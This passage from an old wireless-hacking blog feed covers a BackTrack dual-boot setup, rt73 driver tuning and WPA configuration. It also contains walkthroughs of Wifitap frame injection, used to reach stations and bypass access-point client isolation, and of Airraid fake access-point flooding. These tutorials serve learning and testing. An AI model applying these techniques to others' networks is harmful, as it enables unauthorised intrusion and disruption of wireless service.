<p>d</p>
<p>5</p>
<p>w</p>
<p>now reboot once as the kernel is still using old tables</p>
<p>root@ThUnDerBolT:~#init 6</p>
<p>now back to terminal after reboot</p>
<p>root@ThUnDerBolT:~#fdisk /dev/sda</p>
<p>n</p>
<p>29561</p>
<p>30325</p>
<p>n</p>
<p>30326</p>
<p>30334</p>
<p>n</p>
<p>30335</p>
<p>30401</p>
<p>t</p>
<p>2  #only if you are seeing your NTFS partition as Hidden HPFS/NTFS</p>
<p>7  #change Hidden HPFS/NTFS to Normal HPFS/NTFS partition</p>
<p>t</p>
<p>3 #only if you are seeing your NTFS partition as Hidden HPFS/NTFS</p>
<p>7 #change Hidden HPFS/NTFS to Normal HPFS/NTFS partition</p>
<p>t</p>
<p>7</p>
<p>82 #setting last sda7 as swap partition</p>
<p>p</p>
<p>and it should look like this now</p>
<p><img class="aligncenter size-full wp-image-193" title="snapshot6" src="http://wifi0wn.files.wordpress.com/2009/02/snapshot6.png?w=450&#038;h=281" alt="snapshot6" width="450" height="281" />now write the tables</p>
<p>w</p>
<p>root@ThUnDerBolT:~#mke2fs /dev/sda6</p>
<p>root@ThUnDerBolT:~#mkswap /dev/sda7</p>
<p>root@ThUnDerBolT:~#swapon /dev/sda7</p>
<p>root@ThUnDerBolT:~#mkreiserfs /dev/sda5</p>
<p>Choose Y</p>
<p>root@ThUnDerBolT:~#mkdir /mnt/backtrack</p>
<p>root@ThUnDerBolT:~#mount /dev/sda5 /mnt/backtrack</p>
<p>root@ThUnDerBolT:~#mkdir /mnt/backtrack/boot</p>
<p>root@ThUnDerBolT:~#mount /dev/sda6 /mnt/backtrack/boot</p>
<p>root@ThUnDerBolT:~#cp &#8211;preserve -R /{bin,dev,home,pentest,root,boot,usr,etc,lib,opt,sbin,var} /mnt/backtrack</p>
<p>root@ThUnDerBolT:~#cd /mnt/backtrack</p>
<p>root@ThUnDerBolT:~#mkdir {mnt,proc,sys,tmp}</p>
<p>root@ThUnDerBolT:~#chmod 1777 /mnt/backtrack/tmp</p>
<p>root@ThUnDerBolT:~#mount &#8211;bind /dev /mnt/backtrack/dev</p>
<p>root@ThUnDerBolT:~#mount -t proc proc /mnt/backtrack/proc/</p>
<p>root@ThUnDerBolT:~#chroot /mnt/backtrack /bin/bash</p>
<p>root@ThUnDerBolT:~#nano /etc/lilo.conf</p>
<p>your LILO config should look like this</p>
<p><img class="aligncenter size-full wp-image-194" title="snapshot7" src="http://wifi0wn.files.wordpress.com/2009/02/snapshot7.png?w=450&#038;h=281" alt="snapshot7" width="450" height="281" />Replace the windows partition with yours e.g. /dev/sda1 to blah blah</p>
<p>save and exit</p>
<p>root@ThUnDerBolT:~#lilo -v</p>
<p>reboot</p>
<p>Make mount points for our windows/pen drive</p>
<p>root@ThUnDerBolT:~#mkdir /mnt {sda1,sda2,sda3,sdb1,sr0)</p>
<p>root@ThUnDerBolT:~#nano /etc/fstab</p>
<p>Update your fstab file &amp; add entries of partitions there</p>
<p>here is how my fstab looks like.update it accordingly to your HDD partitions</p>
<p><img class="aligncenter size-full wp-image-195" title="snapshot8" src="http://wifi0wn.files.wordpress.com/2009/02/snapshot8.png?w=450&#038;h=281" alt="snapshot8" width="450" height="281" /></p>
<p>Save &amp; Exit</p>
<p>root@ThUnDerBolT:~#init 6</p>
<p>That&#8217;s it!</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>BUGS/Mods:</p>
<p>1.if you are getting error &#8220;cannot obtain lock on /media/.hal-mtab&#8221; then enter the mount partion entry into /etc/fstab file.e.g as I was getting this error while accessing DVD Drive and Pen-Drive or windows partitions then make directories and update fstab file</p>
<p>2.if you have used command &#8220;update-rc.d networking defaults&#8221;.every time BT starts it will look for DHCP address for NIC&#8217;s.if you don&#8217;t have any connection at that time.it will just keep looking.for getting it out press ctrl +c and enter.it will carry on booting then.</p>
<p>3.those who wants to manually start networking type</p>
<p>root@ThUnDerBolT:~#/etc/init.d/networking start</p>
<p>If any bugs feel free to comment it and to update on remote-exploit forum.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/189/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/189/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/189/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=189&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2009/02/11/backtrack-4-beta-windows-7-ultimate-dual-boot/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/snapshot4.png" medium="image">
			<media:title type="html">snapshot4</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/snapshot5.png" medium="image">
			<media:title type="html">snapshot5</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/snapshot6.png" medium="image">
			<media:title type="html">snapshot6</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/snapshot7.png" medium="image">
			<media:title type="html">snapshot7</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2009/02/snapshot8.png" medium="image">
			<media:title type="html">snapshot8</media:title>
		</media:content>
	</item>
		<item>
		<title>Enhanced features Of rt73 module/WPA_Supplicant Issues Fixed</title>
		<link>http://wifi0wn.wordpress.com/2008/07/28/enhanced-features-of-rt73-modulewpa_supplicant-issues-fixed/</link>
		<comments>http://wifi0wn.wordpress.com/2008/07/28/enhanced-features-of-rt73-modulewpa_supplicant-issues-fixed/#comments</comments>
		<pubDate>Mon, 28 Jul 2008 23:46:01 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[driver]]></category>
		<category><![CDATA[new module]]></category>
		<category><![CDATA[rt 73]]></category>
		<category><![CDATA[rt73]]></category>
		<category><![CDATA[txpower]]></category>
		<category><![CDATA[wpa]]></category>
		<category><![CDATA[wpa2]]></category>
		<category><![CDATA[wpa_supplicant]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=80</guid>
		<description><![CDATA[Look for the wiki of backtrack HCL to know which cards are having rt73 chipset. Tested on hardware Linksys WUSB54GC rt73 chipset based. there is new update for rt73 chipset based cards.first download the latest modules. working with wpa_supplicant. you need to patch wpa_supplicant or use the next generation rt2x00 driver which is compatible with [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=80&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Look for the wiki of backtrack HCL to know which cards are having rt73 chipset.</p>
<p>Tested on hardware Linksys WUSB54GC rt73 chipset based.</p>
<p>there is new update for rt73 chipset based cards.first download the latest modules.</p>
<p>working with wpa_supplicant.<br />
you need to patch wpa_supplicant<br />
or<br />
use the next generation rt2x00 driver which is compatible with wpa_supplicant<br />
or<br />
latest modules of rt73 have in-built private ioctls to support wpa_supplicant like config.</p>
<p>Ok we begin<br />
<a href="http://homepages.tu-darmstadt.de/%7Ep_larbig/wlan/rt73-k2wrlz-3.0.1.tar.bz2" target="_blank">http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-3.0.1.tar.bz2</a><br />
extract archive</p>
<p>ifconfig rausb0 down<br />
modprobe -r rt73<br />
cd rt73-k2wrlz-3.0.1/module<br />
make &amp;&amp; make install</p>
<p>modprobe rt73 ifname=rausb0 or wlan0<br />
(here you can choose the appropriate name according to your choice like wlan0 or rausb0 or eth1 whatever)</p>
<p>now use the iwpriv command to avaliable private ioctls<br />
iwpriv wlan0</p>
<p>bt ~ # iwpriv wlan0<br />
wlan0     Available private ioctls :<br />
set              (8BE2) : set 1024 char  &amp; get   0<br />
txpower          (8BF3) : set 1024 char  &amp; get 1024 char<br />
adhocOfdm        (8BE6) : set   1 int   &amp; get   0<br />
stat             (8BE9) : set 1024 char  &amp; get 1024 char<br />
get_site_survey  (8BEF) : set 1024 char  &amp; get 1024 char<br />
get_RaAP_Cfg     (8BF1) : set 1024 char  &amp; get   0<br />
forceprism       (8BF2) : set 1024 char  &amp; get   0<br />
rfmontx          (8BEC) : set 1024 char  &amp; get   0<br />
get_rfmontx      (8BED) : set   0       &amp; get   1 int<br />
auth             (8BE7) : set   1 int   &amp; get   0<br />
enc              (8BE8) : set   1 int   &amp; get   0<br />
wpapsk           (8BEA) : set  64 char  &amp; get   0<br />
psm              (8BEB) : set   1 int   &amp; get   0</p>
<p>you are able to see that we got options like txpower and wpapsk,auth,enc etc to modify the settings.</p>
<p>if you want to set the txpower output.use<br />
ifconfig wlan0 down<br />
modprobe -r rt73<br />
modprobe rt73 txPowerTuning=36 ifname=wlan0<br />
Remember: This value will be ADDED to the default Power stored in the card&#8217;s EEPROM!<br />
Remember: This value will be ADDED to the default Power stored in the card&#8217;s EEPROM!<br />
<strong>Valid Values for Transmit Power: -6 to 36 (0xFA to 0&#215;24).</strong><br />
<strong>WARNING: MAY DAMAGE YOUR HARDWARE! &#8211; USE AT OWN RISK!<br />
</strong>I set it on my Linksys WUSB54GC as  36 without problem.<br />
now you can use<br />
<strong>iwconfig</strong></p>
<p>it will show the USB NIC interface as newly created wlan0</p>
<p>use <strong>airodump-ng wlan0</strong></p>
<p>you will get pwr much more then before.I got amazingly 90 to 110.</p>
<p>now you have options to use and work with WPA/WPA2 networks.<br />
first option as already told use latest rt2x00 drivers from serialmonkey or configure the wlan0 USB NIC as following</p>
<p>b) WPA (802.11g)</p>
<p>wpa_passphrase &lt;essid&gt; &lt;passphrase&gt;<br />
copy the psk hash(uncommented one)<br />
iwconfig wlan0 mode managed<br />
iwpriv wlan0 set AuthMode=WPAPSK<br />
iwpriv wlan0 set WPAPSK=&lt;key&gt; #replace key with your psk-hash<br />
iwpriv wlan0 set EncrypType=TKIP</p>
<p>c) WPA2 (802.11i)<br />
wpa_passphrase &lt;essid&gt; &lt;passphrase&gt;<br />
copy the psk hash(uncommented one)<br />
iwpriv wlan0 set AuthMode=WPA2PSK<br />
iwpriv wlan0 set WPAPSK=&lt;KEY&gt; #replace key with your psk-hash<br />
iwpriv wlan0 set EncrypType=AES</p>
<p>Check that you&#8217;re associated with an AP<br />
iwconfig wlan0</p>
<p><strong> or</strong><br />
if you want to patch wpa_supplicant for rt73 chipset you need to patch<br />
the wpa_supplicant file to work with rt73 based chipset<br />
download wpa_Supplicant &amp; patch files here.</p>
<p><a href="http://hostap.epitest.fi/releases/wpa_supplicant-0.5.10.tar.gz" target="_blank">WPA_Supplicant-0.5.10.tar.gz</a><br />
<a href="http://mjh.name/files/wpa_supplicant-ralink_rt73.patch" target="_blank">wpa_supplicant-ralink_rt73.patch</a><br />
<a href="http://mjh.name/files/wpa_supplicant-ralink_rt73-fix.patch" target="_blank">wpa_supplicant-ralink_rt73-fix.patch</a></p>
<p>tar xzf wpa_supplicant-0.5.7.tar.gz<br />
cd wpa_supplicant-0.5.7<br />
patch -p1 &lt; wpa_supplicant-ralink_rt73.patch<br />
patch -p1 &lt; wpa_supplicant-ralink_rt73-fix.patch<br />
make<br />
# install as usual, e.g.<br />
cp wpa_cli wpa_supplicant /usr/local/bin</p>
<p><strong>configure using wpa_supplicant(other users who looking for wpa_supplicant config. can try this)</strong></p>
<p>use these commands</p>
<p>wpa_passphrase &lt;essid&gt; &lt;passphrase&gt;<br />
e.g.<br />
bt ~ # wpa_passphrase thunderbolt backtrack3<br />
network={<br />
ssid=&#8221;thunderbolt&#8221;<br />
#psk=&#8221;backtrack3&#8243;<br />
psk=7b8e62496b86b7eba28199fd9af1f560a8503b7ede9149  bd2f42e42e631bedb0<br />
}<br />
copy the psk-hash</p>
<p>for configuring wpa_supplicant<br />
nano /etc/wpa_supplicant.conf</p>
<p>edit it<br />
# WPA protected network, supply your own ESSID and WPAPSK here:<br />
network={<br />
scan_ssid=0 #1 is ssid is hidden<br />
ssid=&#8221;thunderbolt&#8221;  #change with your ssid/essid<br />
proto=WPA<br />
key_mgmt=WPA-PSK<br />
pairwise=CCMP TKIP<br />
group=CCMP TKIP WEP104 WEP40<br />
psk=7b8e62496b86b7eba28199fd9af1f560a8503b7ede9149  bd2f42e42e631bedb0<br />
# change the psk hash with your psk hash you got from wpa_passphrase<br />
}</p>
<p>now connect with WPA/WPA2 enable AP using</p>
<p>bt ~ # wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf &#8211; d rt73 -w  (other user may change to ath0,wifi0)</p>
<p>Trying to associate with 00:21:29:68:16:c2 (SSID=&#8217;thunderbolt&#8217; freq=2462 MHz)</p>
<p>Associated with 00:21:29:68:16:c2<br />
WPA: Key negotiation completed with 00:21:29:68:16:c2 [PTK=TKIP GTK=TKIP]<br />
CTRL-EVENT-CONNECTED &#8211; Connection to 00:21:29:68:16:c2 completed (auth) [id=0 id_str=]</p>
<p>Here you done configuring txpower for new rt73 module,configuring wpa/wpa2.hope you all liked this little hardware hacks and configs.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/wifi0wn.wordpress.com/80/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/wifi0wn.wordpress.com/80/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/80/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/80/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/80/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/80/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/80/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/80/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/80/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/80/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/80/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/80/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/80/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/80/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/80/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/80/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=80&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2008/07/28/enhanced-features-of-rt73-modulewpa_supplicant-issues-fixed/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>
	</item>
		<item>
		<title>Wifitap(Communication Over Wifi Network Without Association</title>
		<link>http://wifi0wn.wordpress.com/2008/07/22/wifitapcommunication-over-wifi-network-without-association/</link>
		<comments>http://wifi0wn.wordpress.com/2008/07/22/wifitapcommunication-over-wifi-network-without-association/#comments</comments>
		<pubDate>Tue, 22 Jul 2008 19:44:18 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[no association]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wifitap]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=69</guid>
		<description><![CDATA[Wifitap is a proof of concept for communication over WiFi networks using traffic injection. Direct communication without association Wifitap allows direct communication with an associated station to a given access point directly, meaning: * not being associated ourselves; * not being handled by access point. airmon-ng start ath0 airmon-ng start wifi0 airmon-ng start wifi0 (Now [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=69&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Wifitap is a proof of concept for communication over WiFi networks using traffic injection.<br />
Direct communication without association</p>
<p>Wifitap allows direct communication with an associated station to a given access point directly, meaning:</p>
<p>* not being associated ourselves;<br />
* not being handled by access point.</p>
<p>airmon-ng start ath0<br />
airmon-ng start wifi0<br />
airmon-ng start wifi0<br />
(Now you have 3 ath interface.ath0,ath1,ath2)</p>
<p>airodump-ng ath1<br />
Note the BSSID of your AP.<br />
Wifitap is ready to be launched to communicate with reachable associated stations to access point</p>
<p>goto /pentest/wireless/wifitap</p>
<p>modprobe tun (we need this tunnel interface to inject frames)</p>
<p>bt wifitap# wifitap.py -b 00:21:29:68:16:C2 -o ath2 -i ath2<br />
(Launching Wifitap creates an tuntap interface named wj0 through which we can inject regular IP traffic)</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAAIq2z31zRk-dr7VLBpI7RqaFv52by356B98R8HGsKTH4RLZxW5TmqBsXBXKiuA5o3JlotqEekFJ3zEtq5ts7EnAJtU9VC6HS8hIkXzX5-w6LQj8G815gqvwg.jpg" alt="" width="609" height="574" /></p>
<p style="text-align:center;">
<p style="text-align:left;">assign an IP address to the wjo interface<br />
bt~#ifconfig wj0 192.168.1.200  (Most of the routers work in 192.168.1.X segment so you can use safely any IP except 192.168.1.1,192.168.1.10,192.168.1.100 etc.)</p>
<p>Now we can reach 192.168.1.0/24 through wj0. now start listening on ath2 interface we can discover associated stations and communicate with them with IP.</p>
<p>bt~#tcpdump -vvv -i ath2</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAADtB2JqS4fABLzmLFRVoAE4_Mx9yO-HgTxLg5c_svvs0WDMIJzF2_ij9GhraqLOgNn8DQMafvZJTP2pLMzvyAWyAJtU9VA0zc4go2Gj2YuIMqewwWgE7hlqxw.jpg" alt="" width="509" height="416" /></p>
<p style="text-align:center;">
<p style="text-align:left;">NB : wj0 MAC address is used as source for sent frames if you don&#8217;t provide source MAC address using -s &lt;SMAC&gt;</p>
<p>bt ~ # route -n<br />
Kernel IP routing table<br />
Destination     Gateway         Genmask         Flags  Metric Ref     Use    Iface<br />
192.168.1.0     0.0.0.0         255.255.255.0   U      0         0           0      eth0<br />
192.168.1.0     0.0.0.0         255.255.255.0   U      0         0           0      wj0<br />
127.0.0.0        0.0.0.0         255.0.0.0          U      0         0           0       lo<br />
0.0.0.0         192.168.1.1     0.0.0.0             UG     0        0           0       eth0</p>
<p>bt ~ # ping 192.168.1.100<br />
PING 192.168.1.100 (192.168.1.100) 56(84) bytes of data.<br />
64 bytes from 192.168.1.100: icmp_seq=1 ttl=64 time=0.045 ms<br />
64 bytes from 192.168.1.100: icmp_seq=2 ttl=64 time=0.036 ms<br />
64 bytes from 192.168.1.100: icmp_seq=3 ttl=64 time=0.035 ms<br />
64 bytes from 192.168.1.100: icmp_seq=4 ttl=64 time=0.040 ms</p>
<p>&#8212; 192.168.1.100 ping statistics &#8212;<br />
4 packets transmitted, 4 received, 0% packet loss, time 2997ms<br />
rtt min/avg/max/mdev = 0.035/0.039/0.045/0.004 ms</p>
<p>you have successfully setup a connection with router.Wifitap allows any application do send and receive IP packets using 802.11 traffic capture and injection over a WiFi network simply configuring wj0, which means :</p>
<p>* setting an IP address consistent with target network address range ;<br />
* routing desired traffic through it.</p>
<p>In particular, it&#8217;s a cheap method for arbitrary packets injection in 802.11 frames without specific library.</p>
<p>In addition, it will allow one to get rid of any limitation set at access point level, such as bypassing inter-client communications prevention systems (e.g. Cisco PSPF) or reaching multiple SSID handled by the same access point.<br />
Wifitap can easily be modified to be used as a framework for simple tasks such as injecting answers to captured frames.</p>
<p>If you want to use Scapy for captured packets parsing and answers generation, it is necessary to add import for related classes. For instance, if you want to work on ICMP packets, just add:</p>
<p>from scapy  import IP,ICMP</p>
<p>Then, you have to rip tuntap interface handling:</p>
<p>* initialisation;<br />
* reading;<br />
* writting.</p>
<p>Finally, you have to modify the main loop to handle interesting frames identification, fields parsing, then answers generation and injection.</p>
<p>Wifitap contains sample programs:</p>
<p>* ARP requests answering machine (wifiarp.py);<br />
* DNS requests answering machine (wifidns.py).<br />
* ICMP Echo Requests answering machine (wifiping.py);</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/wifi0wn.wordpress.com/69/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/wifi0wn.wordpress.com/69/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/69/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=69&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2008/07/22/wifitapcommunication-over-wifi-network-without-association/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAAIq2z31zRk-dr7VLBpI7RqaFv52by356B98R8HGsKTH4RLZxW5TmqBsXBXKiuA5o3JlotqEekFJ3zEtq5ts7EnAJtU9VC6HS8hIkXzX5-w6LQj8G815gqvwg.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAADtB2JqS4fABLzmLFRVoAE4_Mx9yO-HgTxLg5c_svvs0WDMIJzF2_ij9GhraqLOgNn8DQMafvZJTP2pLMzvyAWyAJtU9VA0zc4go2Gj2YuIMqewwWgE7hlqxw.jpg" medium="image" />
	</item>
		<item>
		<title>Airraid(Atheros Based FakeAP)</title>
		<link>http://wifi0wn.wordpress.com/2008/07/22/airraidatheros-based-fakeap/</link>
		<comments>http://wifi0wn.wordpress.com/2008/07/22/airraidatheros-based-fakeap/#comments</comments>
		<pubDate>Tue, 22 Jul 2008 18:19:56 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[airraid]]></category>
		<category><![CDATA[atheros]]></category>
		<category><![CDATA[fakeap]]></category>
		<category><![CDATA[flooding]]></category>
		<category><![CDATA[RogueAp]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=65</guid>
		<description><![CDATA[As I got the script working with my card, I noticed that it was quite effective at throwing a lot of trash onto the 802.11 spectrum. You could quickly fill up a Netstumbler, Kismet or Airodump screen with random stuff. However, if the purpose was to make it appear as if the area was filled [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=65&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>As I got the script working with my card, I noticed that it was quite effective at throwing a lot of trash onto the 802.11 spectrum. You could quickly fill up a Netstumbler, Kismet or Airodump screen with random stuff. However, if the purpose was to make it appear as if the area was filled with access points</p>
<p>Prerequisites</p>
<p>* A card working with the MadWifi drivers. There are some specific commands (wlanconfig) that will need to be changed if you are going to hack this for other cards/drivers.<br />
* A card that supports Master or AP mode. This allows it to function or appear as an access point to wireless clients.<br />
* The Time::HiRes Perl module. [OPTIONAL] This is available from CPAN and allows you to specify sleep times in sub-second increments. Not needed if you are happy with whole second delays.<br />
* The Getopt::Long Perl module. This is available from CPAN and is required for processing of command line arguments passed to airraid.<br />
* macchanger. This is a very handy little utility. It is available here or from various other places. There are many binaries already compiled. It is required to effectively change the MAC address of the wireless card.<br />
* Linux or some form of *nix. Of course.<br />
* Root (superuser) access. I don&#8217;t know this for a fact but I suspect you need to be root to manipulate some of the ifconfig and iwconfig commands.</p>
<p>goto /pentest/wireless/airraid-0.1/<br />
make some modifications to groupfile-example.dat and put some of AP details in following manner<br />
bssid,essid,WEP y/n,channel<br />
for example I entered<br />
00:21:29:68:16:C2,thunderbolt,Y,11<br />
00:39:67:12:33:W2,UTStarcom,Y,11<br />
00:98:G3:VV:23:55,netgear,Y,6<br />
00:56:F5:JP:23:44,beetel,Y,4<br />
22:66:g6:78:34:11,Ubiquiti,Y,7<br />
34:77:88:1V:H8,S0,wifi0wn,Y,2<br />
00:1E:40:14:F6:D4,PRAVEEN,Y,11</p>
<p>save and close it</p>
<p>nano airraid.pl</p>
<p>edit my @words= put these  strings in end.its random generation of ESSID&#8217;s.<br />
my @words = ( &#8220;Access Point&#8221;, &#8220;tsunami&#8221;, &#8220;host&#8221;, &#8220;airport&#8221;, &#8220;linksys&#8221;, &#8220;Netgear&#8221;, &#8220;Cisco&#8221;, &#8220;Wireless&#8221;, &#8220;2wire&#8221;, &#8220;intel&#8221;, &#8220;WLAN&#8221; , &#8220;thunderbolt&#8221; , &#8220;UTStarcom&#8221; , &#8220;beetel&#8221; , &#8220;Ubiquiti&#8221;, &#8220;wifi0wn&#8221; , &#8220;PRAVEEN&#8221;);</p>
<p>bt~#airraid.pl &#8211;interface ath0</p>
<p>This is about as simple as you can go. This will generate fully random (wireless) MAC addresses, no WEP (open), full power, use a random assortment of the built-in default ESSIDs, sleep for the default (0.6 sec) between generations, and use all available channels. The MACs will, in all likelihood, almost never be repeated so any scanners will see a nearly infinite number of APs if they watch long enough.For testing it I monitored using another wireless interface.</p>
<p>bt~#airodump rausb0<br />
(Check that all the FakeAP is having encryption type OPN)</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAAVvkoLk4NSABnR42ueLWtqteBBlOR6tRuKl8VYFfjgoAdfGjqJ1bh0kc7gC4sRxVPpnWOWuOf_Mle3ObsGH32aAJtU9VAMrzN8fW3pM6gY9QoBqQPaMSfCiw.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">
<p style="text-align:left;">bt~#airodump rausb0<br />
(Check that all the FakeAP is having encryption type OPN)</p>
